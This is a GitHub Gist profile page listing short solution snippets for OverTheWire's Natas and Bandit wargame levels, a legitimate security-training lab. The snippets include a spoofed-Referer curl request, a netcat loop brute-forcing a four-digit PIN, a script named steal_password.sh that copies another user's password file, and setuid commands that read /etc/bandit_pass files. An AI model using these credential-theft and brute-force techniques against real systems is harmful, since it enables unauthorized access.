Skip to content

Instantly share code, notes, and snippets.

View HFahlstedt's full-sized avatar

Håkan Fahlstedt HFahlstedt

0 followers · 3 following
View GitHub Profile
@HFahlstedt
HFahlstedt / otw_natas8b.php
Created February 28, 2018 15:47
<?
print base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));
?>
@HFahlstedt
HFahlstedt / otw_natas8.php
Created February 28, 2018 15:33
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
@HFahlstedt
HFahlstedt / natas6.php
Last active February 28, 2018 15:32
<?
include "includes/secret.inc";
  if(array_key_exists("submit", $_POST)) {
  if($secret == $_POST['secret']) {
  print "Access granted. The password for natas7 is <censored>";
  } else {
  print "Wrong secret";
  }
}
@HFahlstedt
HFahlstedt / otw_natas4.sh
Created February 26, 2018 16:38
curl -u natas4:<password for natas4> -H "Referer: http://natas5.natas.labs.overthewire.org/" natas4.natas.labs.overthewire.org
@HFahlstedt
HFahlstedt / otw_natas0.sh
Created February 20, 2018 00:02
curl -u natas0:natas0 http://natas0.natas.labs.overthewire.org
@HFahlstedt
HFahlstedt / otw_bandit24.sh
Created February 18, 2018 00:18
seq -f "<password of bandit24> %04g" 9999 | nc localhost 30002
@HFahlstedt
HFahlstedt / steal_password.sh
Created February 17, 2018 23:35
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/stolen_password_from_bandit24/password.txt
@HFahlstedt
HFahlstedt / otw_bandit20a.sh
Created February 17, 2018 20:33
echo <password for bandit20> | nc -l 12345
@HFahlstedt
HFahlstedt / otw_bandit19b.sh
Created February 6, 2018 09:13
./bandit20-do cat /etc/bandit_pass/bandit20
@HFahlstedt
HFahlstedt / otw_bandit19a.sh
Created February 5, 2018 09:44
./bandit20-do whoami